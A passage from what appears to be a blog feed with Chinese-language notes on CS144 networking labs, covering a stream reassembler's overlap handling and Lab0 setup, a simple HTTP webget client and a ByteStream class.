id="三、环境配置">三、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab1 之前需要合并一些 Lab1 的依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab1-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="四、如何调试">四、如何调试</h2><p>先 cmake &amp;&amp; make 一个 Debug 版本的程序。</p><p>所有的评测程序位于<code>build/tests/</code>中，先一个个手动执行过去。</p><p>若输出了错误信息，则使用 gdb 调试一下。</p><h2 id="五、StreamReassembler-实现">五、StreamReassembler 实现</h2><h3 id="1-要求">1. 要求</h3><p>在我们所实现的流重组器中，有以下几种特性：</p><ul><li><p>接收子字符串。这些子字符串中包含了一串字节，以及该字符串在<strong>总的数据流</strong>中的<strong>第一个字节的索引</strong>。</p><blockquote><p>是不是有TCP那味了 :-)  感兴趣可以看看真实世界中的 TCP 报文段结构 - <a href="https://kiprey.github.io/2021/05/cnatda-1/#a-TCP%E6%8A%A5%E6%96%87%E6%AE%B5%E7%BB%93%E6%9E%84">Kiprey Blog</a></p></blockquote></li><li><p>流的每个字节都有自己唯一的索引，从零开始向上计数。</p></li><li><p>StreamReassembler 中存在一个 ByteStream 用于输出，当重组器知道了流的下一个字节，它就会将其写入至 ByteStream中。</p></li></ul><p>需要注意的是，传入的子串中：</p><ul><li><p>子串之间可能相互重复，存在重叠部分</p><blockquote><p>但假设重叠部分数据完全重复。</p><p>不存在某些 index 下的数据在某个子串中是一种数据，在另一个子串里又是另一种数据。</p></blockquote><blockquote><p>重叠部分的处理最为麻烦。</p></blockquote></li><li><p>可能会传一些已经被装配了的数据</p></li><li><p>如果 ByteStream 已满，则必须暂停装配，将未装配数据暂时保存起来</p></li></ul><p>除了上面的要求以外，容量 Capacity 需要严格限制：</p><p><img src="/2021/11/cs144-lab1/image-20211107124153476.png" alt="image-20211107124153476"></p><p>为了便于说明，将图中的<strong>绿色区域</strong>称为 ByteStream，将图中**存放红色区域的内存范围（即 first unassembled - first unacceptable）**称为 Unassembled_strs。</p><p>CS144 要求将 <strong>ByteStream + Unassembled_strs 的内存占用总和</strong>限制在 <strong>Reassember 中构造函数传入的 capacity 大小</strong>。因此我们在构造 Reassembler 时，需要既将传入的 capacity 参数设置为 <code>ByteStream</code>的缓冲区大小上限，也将其设置为<strong>first unassembled - first unacceptable</strong>的范围大小，以避免极端情况下的内存使用。</p><blockquote><p>注意：<strong>first unassembled - first unacceptable</strong>的范围大小，并不等同于<strong>存放尚未装配子串的结构体内存大小上限</strong>，别混淆了。</p></blockquote><p>Capacity 这个概念很重要，因为它不仅用于限制高内存占用，而且它还会起到流量控制的作用（见 lab2）。</p><h3 id="2-实现思路">2. 实现思路</h3><p>总体上，现阶段的要求还是比较简单的，但是，这里面需要考虑到相当多的情况。</p><p>在具体说明处理情况之前，我们先简单定义几个变量来指示当前状态：</p><ul><li><code>_next_assembled_idx</code>：下一个待装配的字节索引</li><li><code>_unassemble_strs</code>: 一个字节索引到数据子串的 map 映射</li><li><code>_eof_idx</code>: 指示哪个字节索引代表 EOF</li></ul><p>以下是具体需要考虑的情况</p><ol><li><p><code>index &lt;=  _next_assembled_idx &amp;&amp; index + data.size() &gt; _next_assembled_idx</code></p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">index    _next_assembled_idx   index+data.size()   </span><br><span class="line">  V               V                   V </span><br><span class="line">--+-----------------------------------+-----------------------------</span><br><span class="line">  |///////////////|///////////////////|</span><br><span class="line">--+-----------------------------------+-----------------------------</span><br></pre></td></tr></table></figure><p>这种情况可以先截断掉</p><ul><li>前面已经装配过的那部分数据</li><li>后面与<strong>已经存入 _unassembled_strs 的数据</strong>重合的那部分数据</li></ul><p>这样截断是为了让每次装配进的数据与存入 _unassembled_strs 的数据不产生重合，简化处理逻辑。</p><p>之后就可以直接装配，无需任何额外处理。</p><p>如果装配不下，即 <code>_output</code> 已满，那么就必须先放入待装配队列 <code>_unassembled_strs</code> 中，等待装配。</p></li><li><p><code>index &gt; _next_assembled_idx</code></p><p>这种情况是需要认真考虑的，因为这种情况可能会与一些已经保存起来的未装配子串重合，导致大量的内存占用以及无用的轮询处理。对于传入数据的始末位置，分别有好几种情况。</p><blockquote><p>为了便于说明，我们将<code>_unassembled_strs</code>中比 index <strong>小且距离最近</strong>的那部分数据，称作 up_data, 其起始位置称为 up_idx。<br>down_data 和 down_idx 同上，指的是在 <code>_unassembled_strs</code>中比当前传入 index 大且距离最近的那部分数据与起始位置。</p><p>up 指的是数据前面的那个方向，down 是数据后面的那个方向。</p></blockquote><p>首先是传入数据头部位置的情况：</p><ol><li><p>若 up_idx + up_data.size() &lt;= index, 则说明当前传入 data 没有与已经保存的上一个子串重叠。这种无需处理</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">_next_assembled_idx  up_idx                  index  </span><br><span class="line">          V            V    up_data.size      V </span><br><span class="line">----------+------------+------------------+---+-----------------...</span><br><span class="line">          |            |++++++++++++++++++|   |\\\\\\\\\\\\\\\\\...</span><br><span class="line">----------+------------+------------------+---+-----------------...</span><br></pre></td></tr></table></figure></li><li><p>若 up_idx + up_data.size() &gt; index, 则说明传入数据前半部分重合，需要进行截断，同时在截断后更新当前 index。</p><p>截断前：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">_next_assembled_idx  up_idx       up_idx+up_data.size     </span><br><span class="line">          V            V                  V </span><br><span class="line">----------+------------+-----------+------+-----------------...</span><br><span class="line">          |            |+++++++++++|+/+/+/|\\\\\\\\\\\\\\\\\...</span><br><span class="line">----------+------------+-----------+------+-----------------...</span><br><span class="line">                                   A</span><br><span class="line">                                 index</span><br></pre></td></tr></table></figure><p>截断后：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">_next_assembled_idx  up_idx       up_idx+up_data.size     </span><br><span class="line">          V            V                  V </span><br><span class="line">----------+------------+------------------+-----------------...</span><br><span class="line">          |            |++++++++++++++++++|\\\\\\\\\\\\\\\\\...</span><br><span class="line">----------+------------+------------------+-----------------...</span><br><span class="line">                                          A</span><br><span class="line">                                        new_idx</span><br></pre></td></tr></table></figure></li></ol><p>而对于传入数据尾部位置的情况，情况又有所不同：</p><ol><li><p>若 index + data.size() &lt;= down_idx，则说明当前数据的后半部分没有重合，此时无需进行任何处理。</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> index      index+data.size  down_idx</span><br><span class="line">   V               V            V</span><br><span class="line">---+---------------+------------+------------------...</span><br><span class="line">   |///////////////|            |++++++++++++++++++...</span><br><span class="line">---+---------------+------------+------------------...</span><br></pre></td></tr></table></figure></li><li><p>若 index + data.size() &gt; down_idx，则说明后半部分重合。但后半部分重合又有两种情况</p><ol><li><p><code>index + data.size() &lt; down_idx + down_data.size()</code>，这种就是常规情况的部分重合，截断掉重合部分即可</p><p>截断前：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index              index+data.size   </span><br><span class="line">   V                       V  </span><br><span class="line">---+---------------+-------+------------+-----...</span><br><span class="line">   |///////////////|+/+/+/+|++++++++++++|     ...</span><br><span class="line">---+---------------+-------+------------+-----...</span><br><span class="line">                   A                    A</span><br><span class="line">                down_idx       down_idx+down_data.size</span><br></pre></td></tr></table></figure><p>截断后</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index       index+data.size   </span><br><span class="line">   V               V  </span><br><span class="line">---+------------------------------------+-----...</span><br><span class="line">   |///////////////|++++++++++++++++++++|     ...</span><br><span class="line">---+------------------------------------+-----...</span><br><span class="line">                   A                    A</span><br><span class="line">                down_idx       down_idx+down_data.size</span><br></pre></td></tr></table></figure></li><li><p>index + data.size() &lt; down_idx + down_data.size()，这种是完全重合：当前传入的 data <strong>完全覆盖</strong>下一个保存的data，此时将下一个 data 丢弃。</p><p>注意，若存在完全覆盖的情况，则需要<strong>重复</strong>检测 index + data.size 的位置与<strong>丢弃下一个data后，新的下一个data</strong>的<strong>末尾</strong>位置。因为可能当前传入的 data 会<strong>同时覆盖好几个</strong>保存的 data。</p><p>处理前：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index                          index+data.size   </span><br><span class="line">   V                                    V  </span><br><span class="line">---+-----+--------------------+---------+-----+------...</span><br><span class="line">   |/////|/+/+/+/+/+/+/+/+/+/+|/////////|     |++++++...</span><br><span class="line">---+-----+--------------------+---------+-----+------...</span><br><span class="line">         A                    A                 </span><br><span class="line">      down_idx       down_idx+down_data.size   </span><br></pre></td></tr></table></figure><p>处理后：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index                          index+data.size   </span><br><span class="line">   V                                    V  </span><br><span class="line">---+------------------------------------+-----+------...</span><br><span class="line">   |////////////////////////////////////|     |++++++...</span><br><span class="line">---+------------------------------------+-----+------...</span><br><span class="line">                                              A</span><br><span class="line">                                          新的 down_idx</span><br></pre></td></tr></table></figure></li></ol></li></ol></li></ol><p>上面所描述的处理方式可以很好的保证，<strong>_unassembled_strs 中的各个子串之间互不重叠，提高了内存利用效率</strong>。这是一种用时间换空间的方式，因为个人认为，从不可靠网络中获取到的数据是相当宝贵的，与降低处理时间相比，会更加宝贵一点。</p><p>EOF 的实现需要严格按照实验指导书来。当传入的 eof 参数为真时，表示当前传入的数据子串的<strong>最后一个字节将是整个流中的最后一个字节</strong>，这并不意味着这是最后一次调用 reassembler 来传入子串，因此需要额外将这个 eof_idx 保存，并在 reassemble 后判断一下是否到达 EOF 位置。</p><h3 id="3-具体实现">3. 具体实现</h3><p>实现的代码已经上传到github上</p><ul><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/stream_reassembler.hh">stream_reassembler.hh</a></li><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/stream_reassembler.cc">stream_reassembler.cc</a></li></ul><p>以下是测试结果，总测试时间低于0.5s，还可以。</p><p><img src="/2021/11/cs144-lab1/image-20211107094807715.png" alt="image-20211107094807715"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab1 的一些笔记 - 流重组器 StreamReassembler&lt;/p&gt;
&lt;p&gt;CS144 Lab1 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab1.pdf&quot;&gt;Lab Checkpoint 1: stitching substrings into a byte stream&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;PS: 在做 CS144 前，最好先学一手计网理论，或者读读我之前写的&lt;a href=&quot;https://kiprey.github.io/2021/05/cnatda-1/#4-%E9%9D%A2%E5%90%91%E8%BF%9E%E6%8E%A5%E7%9A%84%E8%BF%90%E8%BE%93%EF%BC%9ATCP&quot;&gt;笔记&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab0</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab0/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab0/</id>
    <published>2021-11-03T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.906Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者配置 CS144 计算机网络实验环境的一些步骤。</p><p>CS144 Lab0 实验指导书 - <a href="https://cs144.github.io/assignments/lab0.pdf">Lab Checkpoint 0: networking warmup</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><p>如果是使用自己的 Linux 操作系统，照着这个装就好 - <a href="https://stanford.edu/class/cs144/vm_howto/vm-howto-byo.html">BYO Linux installation</a>。</p><p>不过鉴于目前 Linux 下已经装了不少的东西，因此我这边只需额外再装一个 doxygen + clang-format</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install doxygen clang-format</span><br></pre></td></tr></table></figure><p>之后下载 CS144 实验包，然后编译</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> --recursive git@github.com:Kiprey/sponge.git</span><br><span class="line"><span class="built_in">mkdir</span> -p sponge/build</span><br><span class="line"><span class="built_in">cd</span> sponge/build</span><br><span class="line">cmake ..</span><br><span class="line">make</span><br></pre></td></tr></table></figure><p>cmake 时可以设置几种编译宏：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">-DCMAKE_BUILD_TYPE=Release   <span class="comment"># optimizations</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=Debug     <span class="comment"># debug symbols and -Og</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=RelASan   <span class="comment"># release build with ASan and UBSan</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=RelTSan   <span class="comment"># release build with ThreadSan (私以为这个大概率用不到)</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=DebugASan <span class="comment"># debug build with ASan and UBSan</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=DebugTSan <span class="comment"># debug build with ThreadSan</span></span><br></pre></td></tr></table></figure><p>make 也有一些可以用到的编译选项，这里只罗列出比较常用的选项：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">make doc     <span class="comment"># 在 build/doc 中生成本地静态文档，通过 index.html 访问</span></span><br><span class="line">make format  <span class="comment"># 使用 CLANG 套件 来格式化代码</span></span><br><span class="line">make <span class="built_in">help</span>    <span class="comment"># 查看全部可make的目标</span></span><br><span class="line">make check_* <span class="comment"># 检测编写的代码</span></span><br></pre></td></tr></table></figure><h2 id="三、代码风格">三、代码风格</h2><p>CS144 使用 C++11 标准完成实验，它对C++代码的风格有着严格的限制：</p><ul><li><p>使用 Resource acquisition is initialization 风格，即 RAII 风格。</p></li><li><p>禁止使用 malloc 和 free 函数</p></li><li><p>禁止使用 new 和 delete 关键字</p></li><li><p>禁止使用原生指针（*）。若有必要，最好使用智能指针（unique_ptr等等）。</p><blockquote><p>CS144实验指导书说明，该实验没有必要用到指针。</p></blockquote></li><li><p>禁止使用模板、线程相关、各类锁机制以及虚函数</p></li><li><p>禁止使用C风格字符串(char*) 以及 C 风格字符串处理函数。使用 string 来代替。</p></li><li><p>禁止使用 C 风格强制类型转换。若有必要请使用 <code>static_cast</code></p></li><li><p>传递参数给函数时，请使用常量引用类型（const Ty&amp; t）</p></li><li><p>尽可能将每个变量和函数方法都声明成 const</p></li><li><p>禁止使用全局变量，以及尽可能让每个变量的作用域最小</p></li><li><p>在完成代码后，务必使用 <code>make format</code> 来标准化代码风格。</p></li></ul><h2 id="四、尝试手动访问网页">四、尝试手动访问网页</h2><p>使用 <code>telnet cs144.keithw.org http</code>命令以连接远程网页服务器，之后在终端键入以下内容</p><blockquote><p>内容中的<code>&lt;enter&gt;</code>指的是按下回车符</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET /hello HTTP/1.1&lt;enter&gt;</span><br><span class="line">Host: cs144.keithw.org&lt;enter&gt;</span><br><span class="line">Connection: close&lt;enter&gt;</span><br><span class="line">&lt;enter&gt;</span><br></pre></td></tr></table></figure><p>之后就可以看到远程服务器将内容正确返回:</p><p><img src="/2021/11/cs144-lab0/image-20211105091331646.png" alt="image-20211105091331646"></p><p>比较有意思的是， telnet 在进行 http 访问下，会自动将用户输入的换行转化为 <code>\r\n</code>，而 nc 程序不会这样做。</p><h2 id="五、-动手实现一个网络程序">五、 动手实现一个网络程序</h2><p>这里我们需要实现一个程序 <code>webget</code>，用于访问外部网页，类似于 wget。</p><p>代码量预计 10 行左右，位于<code>apps/webget.cc</code>，实现代码时务必借助 libsponge 中的 <code>TCPSocket</code> 和 <code>Address</code> 类来完成。</p><p>需要注意的是</p><ul><li><p>HTTP 头部的每一行末尾都是以<code>\r\n</code>结尾，而不是<code>\n</code></p></li><li><p>需要包含<code>Connection: close</code> 的HTTP头部，以指示远程服务器在处理完当前请求后直接关闭。</p></li><li><p>除非获取到EOF，否则必须<strong>循环</strong>从远程服务器读取信息。</p><p>因为网络数据的传输可能断断续续，需要多次 read。</p></li></ul><p>这里贴出我的实现方式：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_URL</span><span class="params">(<span class="type">const</span> string &amp;host, <span class="type">const</span> string &amp;path)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Your code here.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// You will need to connect to the &quot;http&quot; service on</span></span><br><span class="line">    <span class="comment">// the computer whose name is in the &quot;host&quot; string,</span></span><br><span class="line">    <span class="comment">// then request the URL path given in the &quot;path&quot; string.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Then you&#x27;ll need to print out everything the server sends back,</span></span><br><span class="line">    <span class="comment">// (not just one call to read() -- everything) until you reach</span></span><br><span class="line">    <span class="comment">// the &quot;eof&quot; (end of file).</span></span><br><span class="line"></span><br><span class="line">    <span class="function">Address <span class="title">addr</span><span class="params">(host, <span class="string">&quot;http&quot;</span>)</span></span>;</span><br><span class="line">    TCPSocket http_tcp;</span><br><span class="line">    http_tcp.<span class="built_in">connect</span>(addr);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;GET &quot;</span> + path + <span class="string">&quot; HTTP/1.1\r\n&quot;</span>);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;HOST: &quot;</span> + host + <span class="string">&quot;\r\n&quot;</span>);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;Connection: close\r\n&quot;</span>);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;\r\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(!http_tcp.<span class="built_in">eof</span>())</span><br><span class="line">        cout &lt;&lt; http_tcp.<span class="built_in">read</span>();</span><br><span class="line">    http_tcp.<span class="built_in">close</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行的很成功：</p><p><img src="/2021/11/cs144-lab0/image-20211105103200309.png" alt="image-20211105103200309"></p><h2 id="六、实现Lab0">六、实现Lab0</h2><p>Lab0 要求我们实现一个<strong>在内存中的</strong> 有序可靠字节流（有点类似于管道）</p><p>要求</p><ul><li><p>字节流可以从<strong>写入端</strong>写入，并以<strong>相同的顺序</strong>，从<strong>读取端</strong>读取</p></li><li><p>字节流是有限的，写者可以终止写入。而读者可以在读取到字节流末尾时，产生EOF标志，不再读取。</p></li><li><p>所实现的字节流必须支持<strong>流量控制</strong>，以控制内存的使用。当所使用的缓冲区爆满时，将禁止写入操作。直到读者读取了一部分数据后，空出了一部分缓冲区内存，才让写者写入。</p></li><li><p>写入的字节流可能会很长，必须考虑到字节流大于缓冲区大小的情况。即便缓冲区只有1字节大小，所实现的程序也必须支持正常的写入读取操作。</p></li></ul><blockquote><p>在单线程环境下执行，因此不用考虑各类条件竞争问题。</p></blockquote><p>这是在<strong>内存</strong>中的有序可靠字节流，接下来的实验会让我们在<strong>不可靠网络</strong>中实现一个这样的可靠字节流，而这便是<strong>传输控制协议（Transmission Control Protocol，TCP）</strong></p><p>以下是实现的代码。</p><p>首先是类声明的实现，这里我添加了一个私有变量用以存放一些数据：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">ByteStream</span> &#123;</span><br><span class="line">  <span class="keyword">private</span>:</span><br><span class="line">    <span class="comment">// Your code here -- add private members as necessary.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Hint: This doesn&#x27;t need to be a sophisticated data structure at</span></span><br><span class="line">    <span class="comment">// all, but if any of your tests are taking longer than a second,</span></span><br><span class="line">    <span class="comment">// that&#x27;s a sign that you probably want to keep exploring</span></span><br><span class="line">    <span class="comment">// different approaches.</span></span><br><span class="line">    std::deque&lt;<span class="type">char</span>&gt; _queue;</span><br><span class="line">    <span class="type">size_t</span> _capacity_size;</span><br><span class="line">    <span class="type">size_t</span> _written_size;</span><br><span class="line">    <span class="type">size_t</span> _read_size;</span><br><span class="line">    <span class="type">bool</span> _end_input;</span><br><span class="line">    <span class="type">bool</span> _error&#123;&#125;;  <span class="comment">//!&lt; Flag indicating that the stream suffered an error.</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span>:</span><br><span class="line">    <span class="comment">//! Construct a stream with room for `capacity` bytes.</span></span><br><span class="line">    <span class="built_in">ByteStream</span>(<span class="type">const</span> <span class="type">size_t</span> capacity);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \name &quot;Input&quot; interface for the writer</span></span><br><span class="line">    <span class="comment">//!@&#123;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Write a string of bytes into the stream. Write as many</span></span><br><span class="line">    <span class="comment">//! as will fit, and return how many were written.</span></span><br><span class="line">    <span class="comment">//! \returns the number of bytes accepted into the stream</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">write</span><span class="params">(<span class="type">const</span> std::string &amp;data)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns the number of additional bytes that the stream has space for</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">remaining_capacity</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Signal that the byte stream has reached its ending</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">end_input</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Indicate that the stream suffered an error.</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">set_error</span><span class="params">()</span> </span>&#123; _error = <span class="literal">true</span>; &#125;</span><br><span class="line">    <span class="comment">//!@&#125;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \name &quot;Output&quot; interface for the reader</span></span><br><span class="line">    <span class="comment">//!@&#123;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Peek at next &quot;len&quot; bytes of the stream</span></span><br><span class="line">    <span class="comment">//! \returns a string</span></span><br><span class="line">    <span class="function">std::string <span class="title">peek_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Remove bytes from the buffer</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">pop_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Read (i.e., copy and then pop) the next &quot;len&quot; bytes of the stream</span></span><br><span class="line">    <span class="comment">//! \returns a string</span></span><br><span class="line">    <span class="function">std::string <span class="title">read</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the stream input has ended</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">input_ended</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the stream has suffered an error</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">error</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _error; &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns the maximum amount that can currently be read from the stream</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">buffer_size</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the buffer is empty</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">buffer_empty</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the output has reached the ending</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">eof</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">    <span class="comment">//!@&#125;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \name General accounting</span></span><br><span class="line">    <span class="comment">//!@&#123;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Total number of bytes written</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">bytes_written</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Total number of bytes popped</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">bytes_read</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">    <span class="comment">//!@&#125;</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>具体的成员实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 